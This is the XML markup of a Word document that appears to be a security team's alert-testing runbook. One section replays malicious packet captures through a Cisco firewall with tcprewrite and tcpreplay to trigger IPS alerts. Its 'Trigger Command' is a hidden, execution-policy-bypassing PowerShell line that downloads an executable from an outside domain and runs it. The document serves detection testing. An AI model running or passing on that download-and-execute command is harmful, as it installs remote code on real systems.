    <w:p w14:paraId="66384CA5" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Special Considerations:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E133AE" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> no preparation required to run this trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1288569B" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger Command: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -nop -ep bypass -c $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="000D61E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://demitartgourmet.com/changelog/bindata.exe'</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, $f);(New-Object -com WScript.Shell).Exec($f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136F3B39" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D3FB50D" w14:textId="113767E7" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B1090A7" wp14:editId="44894B7B">
            <wp:extent cx="5731510" cy="1822450"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="14660379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822450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0011882C" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BA1A84C" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43C23ACF" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D56FE74" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6C6727" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cisco Firewall Triggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BE3A28" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76C9D516" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Relevant IDS Alerts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3800B4EA" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>IDS Emergent Profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E293BAB" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>IDS Notice Spike</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE2CD9C" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Malware Spike</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF6C63E" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F2019EE" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>These three are the relevant ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8F9E65" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19BC67DA" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE8E3E5" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Use tcprewrite and tcp replay to replay malicious packet captures and trigger IPS alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607BAFE4" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>tcpreplay / tcprewrite is a command line utility that can be used on most linux distributions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0417A6A8" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A6132EE" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Download Malcious pcaps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEB9B45" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>https://docs.securityonion.net/en/2.4/pcaps.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B0727E" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>https://www.malware-traffic-analysis.net/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76253019" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>example for async rat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB337AE" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>https://www.malware-traffic-analysis.net/2024/01/09/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756BC6C7" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B5C5D1" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Use tcprewrite to change the source mac-address, source IP and destination mac-address. Then fix the checksum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5272B0C7" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F49192" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>https://tcpreplay.appneta.com/wiki/tcprewrite#rewriting-source-&amp;-destination-mac-addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05814843" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>https://tcpreplay.appneta.com/wiki/tcprewrite#changing-networks-via-pseudo-nat-sourcedestination-ip-map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBDEAFC" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>https://tcpreplay.appneta.com/wiki/tcpreplay-man.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FECABAC" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4582D56D" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>example commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47429EAC" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>#sets source mac and dest mac with --enet-smac and --enet-dmac flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CE11C9" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>$ tcprewrite --enet-dmac=00:55:22:AF:C6:37 --enet-smac=00:44:66:FC:29:AF --infile=input.pcap --outfile=output.pcap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398D3C0A" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A45144F" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>#rewrite pcap's source IP originally sourced from 10.0.0.0/8 to 172.16.10.10/32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4729223F" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$ tcprewrite --pnat=10.0.0.0/8:172.16.10.10/32 --infile=input.pcap --outfile=output.pcap --skipbroadcast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101394FE" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A47A066" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>#fix the checksum of the pcap after modifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E157E1" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>$ tcprewrite --fixcsum --infile=input.pcap --outfile=output.pcap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F4F8A7" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BF3F510" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>#use the final outputted pcap to replay the capture through a firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790D2AD8" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09319DFA" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>https://tcpreplay.appneta.com/wiki/tcpreplay#examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F863CE3" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>https://tcpreplay.appneta.com/wiki/tcpreplay-man.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDAABBA" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EFAE18D" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>#play the final pcap out of eth0 at topspeed using the -t flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ABB61D" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>$ tcpreplay -i eth0 -t final_output.pcap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7652DA" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55552047" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D30350C" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRDefault="000D61E6"/>
    <w:sectPr w:rsidR="000D61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6194D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A2FAE0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11046836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1E6"/>
    <w:rsid w:val="000D61E6"/>
    <w:rsid w:val="004E64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7CFFE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C13B5854-FF8E-4EEA-8976-15E5B5A28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1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1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1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1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1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1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1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1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1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1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1E6"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="000D6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1E6"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="000D61E6"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="000D61E6"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="000D61E6"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="000D61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1E6"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="000D61E6"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="000D6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61E6"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000D61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185.86.148.111:44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google.com/test?data=upgrade+shell" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://demitartgourmet.com/changelog/bindata.ex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3850</Words>
  <Characters>21945</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>182</Lines>
  <Paragraphs>51</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>25744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BHARGAV</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>DEV BHARGAV</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-14T09:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-14T09:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>